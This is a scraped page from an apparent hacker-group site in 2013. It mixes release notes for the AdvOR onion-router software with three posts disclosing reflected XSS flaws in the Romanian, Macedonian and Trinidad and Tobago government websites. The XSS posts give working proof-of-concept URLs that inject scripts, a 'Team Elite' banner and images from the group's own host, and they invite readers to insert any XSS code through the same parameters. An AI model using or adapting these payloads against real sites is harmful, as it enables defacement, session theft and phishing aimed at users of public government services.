This site uses cookies. In order to read how we handle cookies please click here. Click on this message to accept and hide.
Go to top
98.82.120.188.US.SSL

Ministry of Internal Affairs of Romania - XSS

Vulnerable page: http://www.mai.gov.ro/engleza/Home_eng/english.htm?searWords=

PoC:

Code
http://www.mai.gov.ro/engleza/Home_eng/english.htm?searWords=%22%3E%3Cscript%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2Fscript%3E

Code
http://www.mai.gov.ro/engleza/Home_eng/english.htm?searWords=%22%3E%3Cimg+src%3Dhttp%3A%2F%2Fte-home.net%2Fimages%2Flogo.png%3E&Send.x=8&Send.y=11

You can either include any XSS code in search input box, or request any XSS code directly using GET method and searWords parameter.

XSS#1
XSS#2


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by Neo on 2013-12-11 01:12 0 comments 0 likes

Advanced Onion Router AdvOR 0.3.0.19a

Changes in 0.3.0.19a
- corrected: possible buffer overflow when setting a huge OS version string
- corrected: when changing the default OS version, a buffer that was not allocated with tor_malloc() was freed with tor_free() (thanks to anonymous for reporting this problem on sf.net)
- corrected: a generated AS path included some extra nodes that were before the selected path in the AS tree from geoip_as.h
- the program that imports AS path definitions and generates the geoip_as.h file is now included in the source code archive (as2asm)
- the AS path tree was updated with latest AS path definitions from cidr-report.org; a few errors were corrected in the AS tree import algorithm
- geoip_c.h was updated with GeoIPCountryWhois.csv released on December 5th; there are 84715 IP ranges having 114 ranges in the fake "A1" country; 110 ranges were approximated to real countries
- updated language strings: 1248

File information: AdvOR 0.3.0.19a
Posted by advor on 2013-12-10 21:47 0 comments 0 likes

The Administration for Security and Counterintelligence of Republic of Macedonia - XSS

Vulnerable page: http://www.mvr.gov.mk/DesktopDefault.aspx

PoC:

Code
http://www.mvr.gov.mk/DesktopDefault.aspx?tabindex=0&tabid=47&search="><script>alert(String.fromCharCode(88,83,83))</script>

Code
http://www.mvr.gov.mk/DesktopDefault.aspx?tabindex=0&tabid=47&search="><img src=http://te-home.net/images/logo.png>

You can either include any XSS code in search input box, or request any XSS code directly using GET method and search parameter.

XSS#1
XSS#2


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by Neo on 2013-12-10 11:29 0 comments 0 likes

Government of Trinidad and Tobago - XSS

Vulnerable page: http://www.ttconnect.gov.tt/gortt/portal/ttconnect/GovTTSimpleSearch

PoC:

Code
http://www.ttconnect.gov.tt/gortt/portal/ttconnect/GovTTSimpleSearch?searchKeyword="><h1>XSS found by Team Elite</h1>

Code
http://www.ttconnect.gov.tt/gortt/portal/ttconnect/GovTTSimpleSearch?searchKeyword="><img src=http://te-home.net/images/logo.png>

You can either include any XSS code in search input box, or request any XSS code directly using GET method and searchKeyword parameter.

Screenshot#1
[Screenshot#2


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by Neo on 2013-12-04 19:45 0 comments 0 likes

Advanced Onion Router AdvOR 0.3.0.19

Changes in 0.3.0.19
- corrected: possible buffer overflow when deleting Flash player's history from a truncated .sol file (thanks to anonymous for reporting this problem on sf.net)
- corrected: when updating address maps using the "Associate addresses" dialog, the displayed exit node was changed to "new exit"
- corrected: the number of downloaded bytes was not shown by the Blacklist plugin unless a language file was loaded
- corrected: when an application sent a Socks5 connection request followed by an HTTP request without waiting for connection status for the Socks5 request, the Socks5 connection status was prepended to the HTTP reply; this error prevented some programs from using Socks5 with AdvOR, like the Tor Browser Bundle from torproject.org (thanks to anonymous for reporting this error on sf.net)
- corrected: the circuit build dialog could had been used to build a circuit with no nodes (thanks to anonymous for reporting this problem on sf.net)
- updates from the "Associate addresses" dialog are scheduled instead of updating address maps while the user changes them (thanks to anonymous for reporting this problem on sf.net)
- the function escaped() was replaced by esc_for_log() to solve some possible non-reentrancy problems and memory leaks caused by it
- added instructions for using the Dooble browser with AdvOR, a sample configuration file and a patch that prevents it from downloading scripts from Google to AdvOR\Help\Dooble (readme.txt, AdvOR.ini and patch-dooble.*).
- the Blacklist plugin now has an URL for the "Primary threats" blacklist from iblocklist.com (it can be selected from the URL history combo box)
- updated libraries: libevent-2.0.21-stable, openssl-1.0.1e, zlib-1.2.8, libntlm-1.4
- geoip_c.h was updated with GeoIPCountryWhois.csv released on November 5th; there are 86068 IP ranges having 102 ranges in the fake "A1" country; 102 ranges were approximated to real countries

File information: AdvOR 0.3.0.19
Posted by advor on 2013-12-03 18:32 0 comments 0 likes